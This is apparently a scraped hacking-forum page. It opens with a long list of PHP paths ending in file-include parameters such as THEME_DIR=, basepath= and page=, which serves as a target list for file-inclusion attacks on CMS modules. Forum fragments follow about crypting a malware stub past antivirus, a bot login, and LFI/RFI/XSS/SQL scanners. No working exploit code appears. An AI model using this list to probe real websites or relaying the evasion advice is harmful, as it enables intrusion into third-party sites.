/modules/Forums/admin/admin_board.php?phpEx= /modules/Forums/admin/admin_users.php?phpEx= /library/editor/editor.php?root= /library/lib.php?root= /e107/e107_handlers/secure_img_render.php?p= /modules/My_eGallery/public/displayCategory.php?basepath= /modules/My_eGallery/index.php?basepath= /modules/coppermine/themes/default/theme.php?THEME_DIR= /modules/4nAlbum/public/displayCategory.php?basepath= /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= /modules/coppermine/themes/maze/theme.php?THEME_DIR= /modules/coppermine/include/init.inc.php?CPG_M_DIR= /phpBB/admin/admin_styles.php?mode= /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR= /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR= /index.php?page= /index.php?pag= /index.php?sayfa= /index.php?pg= /index.php?include= /index.php?content= /index.php?p= /index.php?s= /index.php?cont= /index.php?c= /journal.php?m= /index.php?m= /links.php?c= /forums.php?m= /list.php?c= /journal.php?m= /user.php?xoops_redirect= /index.php?id=
  10. User name = sandabot Password = botsanda
  11. Well, you lost the stub... I think the antivirus ate it.
  12. http://vscan.novirusthanks.org Download pass : Crypted With ARMON-64-->ATOM-128-->BASE-64
  13. A script written in Perl that scans for LFI vulnerabilities
  14. I think it's the best anti pop-up. Download
  15. Download http://vscan.novirusthanks.org
  16. No use encrypting it... = 0
  17. PM for the link http://vscan.novirusthanks.org
  18. Scans for LFI, XSS, RFI, SQL, CMD vulnerabilities
  19. Jimmy

    Links

    A few useful links. Tutorials from A to Z (Spanish) Admin page finder online XSS methods XSS, LFI, SQL - Software The best MD5 online decrypter Yahoo stuff
  20. KaoticProtocol Anti Boot Download Spark Anti Boot Download Y! Filter Anti Boot Download
  21. Jotti is like VirusTotal.